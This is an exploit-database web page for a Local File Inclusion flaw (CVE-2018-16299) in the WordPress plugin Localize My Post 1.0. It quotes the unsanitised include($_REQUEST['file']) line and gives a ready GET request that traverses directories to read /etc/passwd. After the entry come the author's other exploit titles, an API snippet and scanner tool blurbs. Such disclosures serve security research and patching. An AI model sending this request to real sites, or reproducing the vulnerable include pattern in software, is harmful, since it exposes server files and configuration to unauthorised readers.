Search for hundreds of thousands of exploits

"WordPress Plugin Localize My Post 1.0 - Local File Inclusion"

Author

Exploit author

"Manuel García Cárdenas"

Platform

Exploit platform

php

Release date

Exploit published date

2018-09-19

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
# Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/localize-my-post/
# CVE: 2018-16299

# DESCRIPTION
# This bug was found in the file: /localize-my-post/ajax/include.php
# include($_REQUEST['file']);
# The parameter "file" it is not sanitized allowing include local files
# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application.

# Local File Inclusion POC:

GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Release DateTitleTypePlatformAuthor
2020-05-21"Composr CMS 10.0.30 - Persistent Cross-Site Scripting"webappsphp"Manuel García Cárdenas"
2019-09-13"phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery"webappsphp"Manuel García Cárdenas"
2019-03-13"WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion"webappsphp"Manuel García Cárdenas"
2018-09-19"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion"webappsphp"Manuel García Cárdenas"
2018-09-19"WordPress Plugin Localize My Post 1.0 - Local File Inclusion"webappsphp"Manuel García Cárdenas"
2018-06-11"WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection"webappsphp"Manuel García Cárdenas"
2018-04-18"Kodi 17.6 - Persistent Cross-Site Scripting"webappsmultiple"Manuel García Cárdenas"
2018-03-12"TextPattern 4.6.2 - 'qty' SQL Injection"webappsphp"Manuel García Cárdenas"
2018-01-12"PyroBatchFTP < 3.19 - Buffer Overflow"doswindows"Manuel García Cárdenas"
2017-12-15"Sync Breeze 10.2.12 - Denial of Service"doswindows"Manuel García Cárdenas"
2017-04-11"WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection"webappsphp"Manuel García Cárdenas"
2016-09-22"Exponent CMS 2.3.9 - Blind SQL Injection"webappsphp"Manuel García Cárdenas"
2016-04-26"ImpressCMS 1.3.9 - SQL Injection"webappsphp"Manuel García Cárdenas"
2016-02-04"UliCMS v9.8.1 - SQL Injection"webappsphp"Manuel García Cárdenas"
2015-10-06"PHP-Fusion 7.02.07 - Blind SQL Injection"webappsphp"Manuel García Cárdenas"
2014-11-17"WebsiteBaker 2.8.3 - Multiple Vulnerabilities"webappsphp"Manuel García Cárdenas"
2014-11-17"Zoph 0.9.1 - Multiple Vulnerabilities"webappsphp"Manuel García Cárdenas"
2014-11-13"Piwigo 2.6.0 - 'picture.php?rate' SQL Injection"webappsphp"Manuel García Cárdenas"
2013-09-30"XAMPP 1.8.1 - 'lang.php?WriteIntoLocalDisk method' Local Write Access"webappsphp"Manuel García Cárdenas"
2013-06-04"Telaen 2.7.x - Open Redirection"webappsphp"Manuel García Cárdenas"
2013-06-04"Telaen 2.7.x - Cross-Site Scripting"webappsphp"Manuel García Cárdenas"
2013-06-03"Telaen - Information Disclosure"webappsphp"Manuel García Cárdenas"
2013-03-10"Asteriskguru Queue Statistics - 'warning' Cross-Site Scripting"webappsphp"Manuel García Cárdenas"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45439/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.